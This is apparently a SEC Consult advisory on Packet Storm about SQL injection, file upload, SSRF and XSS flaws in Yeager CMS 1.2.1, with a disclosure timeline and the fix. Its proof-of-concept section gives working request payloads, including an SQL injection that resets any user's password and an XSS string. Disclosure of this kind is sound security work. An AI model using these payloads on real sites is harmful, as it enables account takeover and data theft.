exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Yeager CMS 1.2.1 File Upload / SQL Injection / XSS / SSRF

Yeager CMS 1.2.1 File Upload / SQL Injection / XSS / SSRF
Posted Feb 11, 2016
Authored by P. Morimoto | Site sec-consult.com

Yeager CMS version 1.2.1 suffers from cross site scripting, remote file upload, server-side request forgery, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection, file upload
advisories | CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570, CVE-2015-7571, CVE-2015-7572
SHA-256 | 03e6c9d482ae673cb0b908755a1f9f71b4985c832a6f00acd3a78b5606fbb2e1

Yeager CMS 1.2.1 File Upload / SQL Injection / XSS / SSRF

Change Mirror Download
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

SEC Consult Vulnerability Lab Security Advisory < 20160210-0 >
=======================================================================
title: Multiple Vulnerabilities
product: Yeager CMS
vulnerable version: 1.2.1
fixed version: 1.3
CVE number: CVE-2015-7567, CVE-2015-7568, CVE-2015-7569, CVE-2015-7570
,
CVE-2015-7571, CVE-2015-7572
impact: Critical
homepage: http://yeager.cm/en/home/
found: 2015-11-18
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com

=======================================================================

Vendor description:
- -------------------
Yeager is an open source CMS that aims to become the most cost/time-effective
solution for medium and large web sites and applications.


Business recommendation:
- ------------------------
Yeager CMS suffers from multiple vulnerabilities due to improper input
validation and unprotected test scripts. By exploiting these vulnerabilities
an attacker could:
1. Change user's passwords including the administrator's account.
2. Gain full access to the Yeager CMS database.
3. Determine internal servers that inaccessible from the Internet.
4. Attack other users of the Yeager CMS with Cross-Site Scripting.

SEC Consult recommends not to use this software until a thorough security
review has been performed by security professionals and all identified
issues have been resolved.

Vulnerability overview/description:
- -----------------------------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
2. Post-authentication Blind SQL Injection (CVE-2015-7569)
3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
5. Non-permanent Cross-site Scripting (CVE-2015-7572)


Proof of concept:
- -----------------
1. Unauthenticated Blind SQL Injection (CVE-2015-7567, CVE-2015-7568)
http://<host>/yeager/?action=passwordreset&token=<SQL Injection>
http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70
&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"<SQL
Injection>"}}]

The vulnerability can also be used for unauthorized reset password of any user.
In order to reset a specific user's password, an attacker will need to provide
a valid email address of the user that he wants to attack.
The email can be retrieved by either social engineering or using the
aforementioned unauthenticated SQL injection vulnerability.

http://<host>/yeager/y.php/responder?handler=recoverLogin&us=sess_20000&lh=70&d
ata=["noevent",{"yg_property":"recoverLogin","params":{"userEmail":"<victim@ema
il.com>","winID":"1"}}]

The above URL just simply creates and sends a reset password token to the
user's email. Next, even if attacker does not know the token,
manipulating SQL commands allows to force to set the new password instantly.

Note that new password MUST be at least 8 characters in length
and must contain both letters and numbers.

http://<host>/yeager/y.php/responder?handler=setNewPassword&us=sess_20000&lh=70
&data=["noevent",{"yg_property":"setNewPassword","params":{"userToken":"'+or+ui
d=(select+id+from+yg_user+where+login='<victim@email.com>')+limit+1--+-","userP
assword":"<new-password>","winID":"1"}}]

2. Post-authentication Blind SQL Injection (CVE-2015-7569)
http://<host>/yeager/y.php/tab_USERLIST
POST Data:
win_no=4&yg_id=2-user&yg_type=user&wid=wid_4&refresh=1&initload=&us=sess_16000&
lh=325&pagedir_page=2&pagedir_perpage=1&pagedir_orderby=<SQL
Injection>&pagedir_orderdir=4&pagedir_from=5&pagedir_limit=6,7&newRole=1

3. Unauthenticated Arbitrary File Upload (CVE-2015-7571)
A publicly known Arbitrary File Upload vulnerability of Plupload was found in
Yeager CMS.
Fortunately, to successfully exploit the vulnerability requires PHP directive
"upload_tmp_dir" set to an existing directory and it must contain the writable
directory "plupload".

By default, the PHP directive "upload_tmp_dir" is an empty value.
As a result, the script will attempt to upload a file to /plupload/ instead
which generally does not exist on the filesystem.

http://<host>/yeager/ui/js/3rd/plupload/examples/upload.php

4. Unauthenticated Server-side Request Forgery (CVE-2015-7570)
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_datadictionary.php
http://<host>/yeager/libs/org/adodb_lite/tests/test_adodb_lite_sessions.php

The parameter "dbhost" can be used to perform internal port scan using
time delay measurement. An attacker can provide internal IP address
and port number, for example, 10.10.0.1:22. The attacker then compares
time delays from multiple responses in order to determine host
and port availability.

5. Non-permanent Cross-site Scripting (CVE-2015-7572)
A previously published XSS vulnerability of Plupload was found in Yeager CMS.
http://<host>/yeager/ui/js/3rd/plupload/js/plupload.flash.swf?id=\%22%29%29;}ca
tch%28e%29{alert%28/XSS/%29;}//


Vulnerable / tested versions:
- -----------------------------
The vulnerabilities have been tested on Yeager CMS 1.2.1

URL: http://yeager.cm/en/download/package/?v=1.2.1.0.0


Vendor contact timeline:
- ------------------------
2015-12-07: Contacting vendor through office@nexttuesday.de, contact@yeager.cm
2015-12-07: Established secure communication channel
2015-12-07: Sending advisory draft
2015-12-10: Yeager CMS 1.2.2 released for security fixes
2015-12-22: Yeager CMS 1.3 released for security fixes
2016-02-10: Public advisory release

Solution:
- ---------
The vulnerability has been fixed in Yeager CMS 1.3 and later.

https://github.com/ygcm/yeager/commit/74e0ce518321e659cda54f3f565ca0ce8794dba8#
diff-4200a6e704ae66ada32f35f69796cc71
https://github.com/ygcm/yeager/commit/053a3b98a9a3f4fd94186cbb8994de0a3e8d9307

Workaround:
- -----------
No workaround available.


Advisory URL:
- -------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Pichaya Morimoto / @2015
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2

iQIcBAEBCAAGBQJWuv/KAAoJEC0t17XG7og/S+wP/3qwNLAa1X/mGfBNxDaVWJD3
nttyPI6moz0noo6mUI+wknslTy3t3iy+XxQNi2Hk0mi5pZbeipn5w2KHTtszu0wv
e7AJ75zEdju+E4B1Si9ozO57RlrLTEC6QyNnQQ5uB7urm5bLcYWP/VyZ7q949H1P
oeWN9cscq1UijHg/ng04GZF7UHXlrCYgWCHQHv9S+AdKS0mlKNx+BYqUV7SXqUc6
95m9xLz9UKStapJKLi/hdaUoh8Vr6GydMxHvE4B5WQzAwgfPeGEvnpgn2Q0k5NPH
fuPHWybKRly+Ugwl9711BAGlsg9xw+NnPjhs1l9yhs8Fs+giBW8eIXm/0IBWMMY7
rHthzJbSVP46qv0INWQY9tS3Rs+HsIBo+e8eDIELPZju7gifAoQcrCjb+Fe9oOCv
tNrY30ouvI9RmPfCR3Y8Ht5R79z3+tG7mGv5nR+qISxksL5n6g55xxbvdusKCViR
C7+xTu1mCLIsEYlYQKx86aEZwY2WoFFnhYKGwT91Z24NtwevdIvkvGMwsJwyuC+5
vDnG5kE/0PxdN+gNjxN1wqR6T31i55KLMfmBKnb651EwA60AgWKX/zMFo3CWkTrl
twjCpxOsP6ET0qn+1gNn+9DryJT04ULUdMGHEO/E9u6Gru1w4yLMEdobRPNMjF1c
SidV8izQNkGtf5LTxTPT
=gTSB
-----END PGP SIGNATURE-----
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    0 Files
  • 20
    Mar 20th
    0 Files
  • 21
    Mar 21st
    0 Files
  • 22
    Mar 22nd
    0 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close